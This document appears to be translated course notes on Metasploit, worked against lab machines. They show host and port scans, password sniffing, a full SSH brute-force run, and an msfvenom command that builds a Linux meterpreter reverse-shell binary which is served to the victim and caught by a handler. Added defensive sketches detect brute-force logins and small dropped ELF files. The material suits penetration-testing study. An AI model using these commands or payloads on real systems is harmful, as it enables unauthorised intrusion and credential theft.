Metasploit Penetration Testing Framework


The following notes were taken while watching this course: https://www.bilibili.com/video/BV127411c7yE?p=6&spm_id_from=pageDriver&vd_source=5294f3174c841de416fef55d145e1e28

Collecting host information over TCP

Open port scanning with db_nmap
db_nmap -sV 192.168.211.211


Finding live hosts on the subnet
search arp
use 1
set RHoSTS 192.168.211.0/24
set threads 10
run

The session and its results look like this:

msf6 > search arp

Matching Modules
================

   #   Name                                           Disclosure Date  Rank       Check  Description
   -   ----                                           ---------------  ----       -----  -----------
   0   auxiliary/spoof/arp/arp_poisoning              1999-12-22       normal     No     ARP Spoof
   1   auxiliary/scanner/discovery/arp_sweep                           normal     No     ARP Sweep Local Network Discovery
   2   post/windows/gather/bloodhound                                  normal     No     BloodHound Ingestor
   3   exploit/unix/webapp/carberp_backdoor_exec      2013-06-28       great      Yes    Carberp Web Panel C2 Backdoor Remote PHP Code Execution
   4   exploit/linux/http/dlink_dcs931l_upload        2015-02-23       great      Yes    D-Link DCS-931L File Upload
   5   auxiliary/scanner/discovery/ipv6_neighbor                       normal     No     IPv6 Local Neighbor Discovery
   6   exploit/windows/browser/ms05_054_onload        2005-11-21       normal     No     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   7   exploit/windows/smb/smb_shadow                 2021-02-16       manual     No     Microsoft Windows SMB Direct Session Takeover
   8   exploit/unix/ftp/proftpd_133c_backdoor         2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   9   auxiliary/scanner/misc/raysharp_dvr_passwords                   normal     No     Ray Sharp DVR Password Retriever
   10  post/windows/gather/arp_scanner                                 normal     No     Windows Gather ARP Scanner
   11  post/windows/gather/forensics/browser_history                   normal     No     Windows Gather Skype, Firefox, and Chrome Artifacts


Interact with a module by name or index. For example info 11, use 11 or use post/windows/gather/forensics/browser_history

msf6 > use 1
msf6 auxiliary(scanner/discovery/arp_sweep) > option
[-] Unknown command: option
msf6 auxiliary(scanner/discovery/arp_sweep) > options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
                                         html
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/arp_sweep) > set RHoSTS 192.168.211.0/24
RHoSTS => 192.168.211.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
threads => 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.211.1 appears to be up (VMware, Inc.).
[+] 192.168.211.2 appears to be up (VMware, Inc.).
[+] 192.168.211.148 appears to be up (VMware, Inc.).
[+] 192.168.211.211 appears to be up (VMware, Inc.).
[+] 192.168.211.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Port scanning with the half-open (SYN) method
msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access                                                                                      

msf6 > use 6
msf6 auxiliary(scanner/portscan/syn) > options 

Module options (auxiliary/scanner/portscan/syn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to scan per set
   DELAY      0                yes       The delay between connections, per thread, in milliseconds
   INTERFACE                   no        The name of the interface
   JITTER     0                yes       The delay jitter factor (maximum value by which to +/- DELAY)
                                          in milliseconds.
   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/usin
                                         g-metasploit/basics/using-metasploit.html
   SNAPLEN    65535            yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    500              yes       The reply read timeout in milliseconds


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/syn) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/portscan/syn) > set ports 80
ports => 80
msf6 auxiliary(scanner/portscan/syn) > set threads 15
threads => 15
msf6 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.211.211:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Password sniffing with the psnuffle module under auxiliary/sniffer

Sniffing means listening in on network traffic.

Commands

msf6 > search psnuf
msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info
msf6 auxiliary(sniffer/psnuffle) > run

Session output

msf6 > search psnuf

Matching Modules
================

   #  Name                        Disclosure Date  Rank    Check  Description
   -  ----                        ---------------  ----    -----  -----------
   0  auxiliary/sniffer/psnuffle                   normal  No     pSnuffle Packet Sniffer


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/sniffer/psnuffle                                                                                

msf6 > use 0
msf6 auxiliary(sniffer/psnuffle) > info

       Name: pSnuffle Packet Sniffer
     Module: auxiliary/sniffer/psnuffle
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Max Moser <mmo@remote-exploit.org>

Available actions:
    Name     Description
    ----     -----------
    List     List protocols
=>  Sniffer  Run sniffer

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILTER                      no        The filter string for capturing traffic
  INTERFACE                   no        The name of the interface
  PCAPFILE                    no        The name of the PCAP capture file to process
  PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or
                                        "all".
  SNAPLEN    65535            yes       The number of bytes to capture
  TIMEOUT    500              yes       The number of seconds to wait for new data

Description:
  This module sniffs passwords like dsniff did in the past


View the full module info with the info -d command.

msf6 auxiliary(sniffer/psnuffle) > options 

Module options (auxiliary/sniffer/psnuffle):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILTER                      no        The filter string for capturing traffic
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or
                                          "all".
   SNAPLEN    65535            yes       The number of bytes to capture
   TIMEOUT    500              yes       The number of seconds to wait for new data


Auxiliary action:

   Name     Description
   ----     -----------
   Sniffer  Run sniffer



View the full module info with the info, or info -d command.

msf6 auxiliary(sniffer/psnuffle) > RUN
[-] Unknown command: RUN
msf6 auxiliary(sniffer/psnuffle) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(sniffer/psnuffle) > 
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] HTTP GET: 192.168.211.152:53870-192.99.200.113:80 http://http.kali.org/kali/pool/main/l/lftp/lftp_4.9.2-2%2bb1_amd64.deb
[*] HTTP GET: 192.168.211.152:46494-104.18.102.100:80 http://kali.download/kali/pool/main/l/lftp/lftp_4.9.2-2+b1_amd64.deb
msf6 auxiliary(sniffer/psnuffle) > [!] *** auxiliary/sniffer/psnuffle is still calling the depted report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!]      https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creatmetasploit-framework-loginscanners.html
[!]      https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-tite-a-http-loginscanner-module.html
[!] *** For examples of modules converted to just report credentials without report_auth_info,:
[!]      https://github.com/rapid7/metasploit-framework/pull/5376
[!]      https://github.com/rapid7/metasploit-framework/pull/5377
[*] Successful FTP Login: 192.168.211.152:52010-192.168.211.211:21 >> msfadmin / msfadmin
[*] HTTP GET: 192.168.211.148:59742-185.125.190.17:80 http://connectivity-check.ubuntu.com/

Collecting host information over SNMP

SNMP is the Simple Network Management Protocol.

msf6 > search snmp_enum

Matching Modules
================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  auxiliary/scanner/snmp/snmp_enum_hp_laserjet                   normal  No     HP LaserJet Printer SNMP Enumeration
   1  auxiliary/scanner/snmp/snmp_enum                               normal  No     SNMP Enumeration Module
   2  auxiliary/scanner/snmp/snmp_enumshares                         normal  No     SNMP Windows SMB Share Enumeration
   3  auxiliary/scanner/snmp/snmp_enumusers                          normal  No     SNMP Windows Username Enumeration


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/snmp/snmp_enumusers

msf6 > use 1
msf6 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/snmp/snmp_enum) > run

Collecting host information over SSH

The attack proceeds as follows:

msf6 > search ssh_login
                                                                                          
Matching Modules                                                                          
================                                                                          
                                                                                          
   #  Name                                    Disclosure Date  Rank    Check  Description 
   -  ----                                    ---------------  ----    -----  ----------- 
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner                                                                               
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner                                                                          
                                                                                          
                                                                                          
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey                                                                    
                                                                                          
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > options 
                                                                                          
Module options (auxiliary/scanner/ssh/ssh_login):                                         

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in
                                                the current database
   DB_ALL_PASS       false            no        Add all passwords in the current databas
                                                e to the list
   DB_ALL_USERS      false            no        Add all users in the current database to
                                                 the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the
                                                current database (Accepted: none, user,
                                                user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target host(s), see https://docs.met
                                                asploit.com/docs/using-metasploit/basics
                                                /using-metasploit.html
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works fo
                                                r a host
   THREADS           1                yes       The number of concurrent threads (max on
                                                e per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords sepa
                                                rated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all
                                                 users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.211.211
rhosts => 192.168.211.211
msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /root/root_userpass.txt
userpass_file => /root/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting        Required  Description
   ----              ---------------        --------  -----------
   BLANK_PASSWORDS   false                  no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                      yes       How fast to bruteforce, from 0 to
                                                      5
   DB_ALL_CREDS      false                  no        Try each user/password couple stor
                                                      ed in the current database
   DB_ALL_PASS       false                  no        Add all passwords in the current d
                                                      atabase to the list
   DB_ALL_USERS      false                  no        Add all users in the current datab
                                                      ase to the list
   DB_SKIP_EXISTING  none                   no        Skip existing credentials stored i
                                                      n the current database (Accepted:
                                                      none, user, user&realm)
   PASSWORD                                 no        A specific password to authenticat
                                                      e with
   PASS_FILE                                no        File containing passwords, one per
                                                       line
   RHOSTS            192.168.211.211        yes       The target host(s), see https://do
                                                      cs.metasploit.com/docs/using-metas
                                                      ploit/basics/using-metasploit.html
   RPORT             22                     yes       The target port
   STOP_ON_SUCCESS   false                  yes       Stop guessing when a credential wo
                                                      rks for a host
   THREADS           1                      yes       The number of concurrent threads (
                                                      max one per host)
   USERNAME                                 no        A specific username to authenticat
                                                      e as
   USERPASS_FILE     /root/root_userpass.t  no        File containing users and password
                     xt                               s separated by space, one pair per
                                                       line
   USER_AS_PASS      false                  no        Try the username as the password f
                                                      or all users
   USER_FILE                                no        File containing usernames, one per
                                                       line
   VERBOSE           false                  yes       Whether to print output for all at
                                                      tempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.211.211:22 - Starting bruteforce
[-] 192.168.211.211:22 - Failed: 'root:'
[-] 192.168.211.211:22 - Failed: 'root:!root'
[-] 192.168.211.211:22 - Failed: 'root:Cisco'
[-] 192.168.211.211:22 - Failed: 'root:NeXT'
[-] 192.168.211.211:22 - Failed: 'root:QNX'
[-] 192.168.211.211:22 - Failed: 'root:admin'
[-] 192.168.211.211:22 - Failed: 'root:attack'
[-] 192.168.211.211:22 - Failed: 'root:ax400'
[-] 192.168.211.211:22 - Failed: 'root:bagabu'
[-] 192.168.211.211:22 - Failed: 'root:blablabla'
[-] 192.168.211.211:22 - Failed: 'root:blender'
[-] 192.168.211.211:22 - Failed: 'root:brightmail'
[-] 192.168.211.211:22 - Failed: 'root:calvin'
[-] 192.168.211.211:22 - Failed: 'root:changeme'
[-] 192.168.211.211:22 - Failed: 'root:changethis'
[-] 192.168.211.211:22 - Failed: 'root:default'
[-] 192.168.211.211:22 - Failed: 'root:fibranne'
[-] 192.168.211.211:22 - Failed: 'root:honey'
[-] 192.168.211.211:22 - Failed: 'root:jstwo'
[-] 192.168.211.211:22 - Failed: 'root:kn1TG7psLu'
[-] 192.168.211.211:22 - Failed: 'root:letacla'
[-] 192.168.211.211:22 - Failed: 'root:mpegvideo'
[-] 192.168.211.211:22 - Failed: 'root:nsi'
[-] 192.168.211.211:22 - Failed: 'root:par0t'
[-] 192.168.211.211:22 - Failed: 'root:pass'
[-] 192.168.211.211:22 - Failed: 'root:password'
[-] 192.168.211.211:22 - Failed: 'root:pixmet2003'
[-] 192.168.211.211:22 - Failed: 'root:resumix'
[-] 192.168.211.211:22 - Failed: 'root:root'
[-] 192.168.211.211:22 - Failed: 'root:rootme'
[-] 192.168.211.211:22 - Failed: 'root:rootpass'
[-] 192.168.211.211:22 - Failed: 'root:t00lk1t'
[-] 192.168.211.211:22 - Failed: 'root:tini'
[-] 192.168.211.211:22 - Failed: 'root:toor'
[-] 192.168.211.211:22 - Failed: 'root:trendimsa1.0'
[-] 192.168.211.211:22 - Failed: 'root:tslinux'
[-] 192.168.211.211:22 - Failed: 'root:uClinux'
[-] 192.168.211.211:22 - Failed: 'root:vertex25'
[-] 192.168.211.211:22 - Failed: 'root:owaspbwa'
[-] 192.168.211.211:22 - Failed: 'root:permit'
[-] 192.168.211.211:22 - Failed: 'root:ascend'
[-] 192.168.211.211:22 - Failed: 'root:ROOT500'
[-] 192.168.211.211:22 - Failed: 'root:cms500'
[-] 192.168.211.211:22 - Failed: 'root:fivranne'
[-] 192.168.211.211:22 - Failed: 'root:davox'
[-] 192.168.211.211:22 - Failed: 'root:letmein'
[-] 192.168.211.211:22 - Failed: 'root:powerapp'
[-] 192.168.211.211:22 - Failed: 'root:dbps'
[-] 192.168.211.211:22 - Failed: 'root:ibm'
[-] 192.168.211.211:22 - Failed: 'root:monitor'
[-] 192.168.211.211:22 - Failed: 'root:turnkey'
[-] 192.168.211.211:22 - Failed: 'root:vagrant'
[+] 192.168.211.211:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.211.152:42941 -> 192.168.211.211:22) at 2023-06-14 04:03:51 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions 

Active sessions
===============

  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH root @   192.168.211.152:42941 -> 192.168.211.211:22 (192.1
                                      68.211.211)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...

pwd
/home/msfadmin
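
Seen from the target's side, the run above is a burst of failed root passwords from 192.168.211.152 followed by one accepted password. The following detection sketch is an added example, not part of the original notes; the log lines are constructed in standard OpenSSH auth.log format, and the threshold, window and function names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth.log lines (not from the original page), modelled on the
# run above: rapid root failures from one source, then a password success.
SAMPLE_LOG = """\
Jun 14 03:58:02 metasploitable sshd[4990]: Failed password for user from 192.168.211.1 port 50122 ssh2
Jun 14 03:58:09 metasploitable sshd[4990]: Accepted password for user from 192.168.211.1 port 50122 ssh2
Jun 14 04:03:40 metasploitable sshd[5012]: Failed password for root from 192.168.211.152 port 42901 ssh2
Jun 14 04:03:42 metasploitable sshd[5013]: Failed password for root from 192.168.211.152 port 42907 ssh2
Jun 14 04:03:44 metasploitable sshd[5014]: Failed password for root from 192.168.211.152 port 42913 ssh2
Jun 14 04:03:46 metasploitable sshd[5015]: Failed password for root from 192.168.211.152 port 42919 ssh2
Jun 14 04:03:48 metasploitable sshd[5016]: Failed password for root from 192.168.211.152 port 42925 ssh2
Jun 14 04:03:50 metasploitable sshd[5017]: Failed password for root from 192.168.211.152 port 42933 ssh2
Jun 14 04:03:51 metasploitable sshd[5020]: Accepted password for msfadmin from 192.168.211.152 port 42941 ssh2
Jun 14 04:03:51 metasploitable sshd[5020]: pam_unix(sshd:session): session opened for user msfadmin by (uid=0)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2023):
    """Return alerts for password guessing and for logins that follow it.

    threshold, window and year are assumptions to tune per environment;
    syslog timestamps carry no year, so one is supplied for parsing.
    """
    failures = defaultdict(deque)  # source IP -> failure times inside the window
    tried = defaultdict(set)       # source IP -> usernames seen in failures
    flagged = set()                # sources already reported as brute forcing
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd/PAM message
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src, user = m["src"], m["user"]
        recent = failures[src]
        while recent and ts - recent[0] > window:
            recent.popleft()  # expire failures older than the window
        if not recent:
            flagged.discard(src)  # quiet period: allow a fresh alert later
        if m["result"] == "Failed":
            recent.append(ts)
            tried[src].add(user)
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"type": "bruteforce", "src": src, "time": ts,
                               "failures": len(recent), "users": sorted(tried[src])})
        elif len(recent) >= threshold:
            # A success right after a burst of failures: treat the account as
            # compromised until proven otherwise.
            alerts.append({"type": "success_after_bruteforce", "src": src,
                           "time": ts, "user": user, "failures": len(recent)})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

The second alert type is the one that matters for response, because it names the account whose password was guessed. On the server side, sshd settings such as MaxAuthTries and PasswordAuthentication no (key-only login) remove the weakness this module relies on.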

Hands-on: building a malicious Linux program to gain access to a company server

Building the malicious Linux program

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.211.152 LPORT=4444 -b"\x00" -i 10 -f elf -o /var/www/html/xuegod

Start the Apache service so that the victim machine can download the file

/etc/init.d/apache2 start

Configure the handler and payload on the attacking machine

use exploit/multi/handler
set lHOST 192.168.211.152
set payload linux/x64/meterpreter/reverse_tcp

Have the victim machine download the file and run it

The attacking machine then obtains access

[*] Started reverse TCP handler on 192.168.211.152:4444 
[*] Sending stage (3045348 bytes) to 192.168.211.128
[*] Meterpreter session 1 opened (192.168.211.152:4444 -> 192.168.211.128:34184) at 2023-06-14 21:44:49 -0400

meterpreter > 
meterpreter > 
meterpreter > 
meterpreter > ls
Listing: /home/testcai
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  314   fil   2023-06-14 21:30:30 -0400  .ICEauthority
100644/rw-r--r--  18    fil   2018-04-10 20:53:01 -0400  .bash_logout
100644/rw-r--r--  193   fil   2018-04-10 20:53:01 -0400  .bash_profile
100644/rw-r--r--  231   fil   2018-04-10 20:53:01 -0400  .bashrc
040700/rwx------  4096  dir   2023-06-14 21:31:13 -0400  .cache
040755/rwxr-xr-x  261   dir   2023-06-14 21:31:15 -0400  .config
040700/rwx------  25    dir   2023-06-14 21:30:29 -0400  .dbus
100600/rw-------  16    fil   2023-06-14 21:30:31 -0400  .esd_auth
040700/rwx------  19    dir   2023-06-14 21:30:30 -0400  .local
040755/rwxr-xr-x  54    dir   2023-06-14 21:31:13 -0400  .mozilla
100775/rwxrwxr-x  655   fil   2023-06-14 21:35:00 -0400  xuegod
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  下载
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  公共
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  图片
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  文档
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  桌面
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  模板
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  视频
040755/rwxr-xr-x  6     dir   2023-06-14 21:30:34 -0400  音乐
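
In the listing above the dropped file is a 655-byte executable in a user's home directory, while the handler reports sending a 3045348-byte stage over the network, so the file on disk is only a small loader. The following triage sketch is an added example, not part of the original notes: it walks a directory tree and reports small executable ELF files. The 4096-byte cut-off, the function names and the constructed sample files (header bytes only, no payload) are assumptions.

```python
import os
import stat
import struct
import tempfile

ELF_TYPES = {2: "EXEC", 3: "DYN"}
ELF_MACHINES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def parse_elf_header(data):
    """Return (bits, type, machine) from the first 20 bytes, or None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None  # corrupt class or byte-order field
    order = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
    return (32 if ei_class == 1 else 64,
            ELF_TYPES.get(e_type, str(e_type)),
            ELF_MACHINES.get(e_machine, str(e_machine)))


def find_small_elf_executables(root, max_size=4096):
    """List regular files under root that are ELF, executable and <= max_size.

    max_size is an assumed triage cut-off, not a value from the page.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & 0o111:
                    continue
                if st.st_size > max_size:
                    continue
                with open(path, "rb") as fh:
                    header = parse_elf_header(fh.read(20))
            except OSError:
                continue  # unreadable or vanished file
            if header:
                bits, kind, machine = header
                hits.append({"path": path, "name": name, "size": st.st_size,
                             "mode": oct(stat.S_IMODE(st.st_mode)),
                             "bits": bits, "type": kind, "machine": machine})
    return sorted(hits, key=lambda h: h["path"])


def demo():
    """Build a constructed home directory and scan it (no real payload involved)."""
    elf64 = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8 + struct.pack("<HH", 2, 62)
    samples = {
        # name: (content, mode)
        "xuegod": (elf64.ljust(655, b"\x00"), 0o775),      # small executable ELF
        "big_tool": (elf64.ljust(8192, b"\x00"), 0o755),   # ELF, above the cut-off
        "notes.bin": (elf64.ljust(655, b"\x00"), 0o644),   # ELF, not executable
        "backup.sh": (b"#!/bin/sh\necho ok\n".ljust(40, b" "), 0o755),  # script
    }
    with tempfile.TemporaryDirectory() as home:
        for name, (content, mode) in samples.items():
            path = os.path.join(home, name)
            with open(path, "wb") as fh:
                fh.write(content)
            os.chmod(path, mode)
        return find_small_elf_executables(home)


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

A hit is a lead for review, not a verdict: correlate it with the file's modification time and with outbound connections from the same host, such as the session to port 4444 shown above.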

Hands-on: penetration using a deb package, a 0day and a Java environment

Building the malicious software package: download the package with --download-only, without installing it
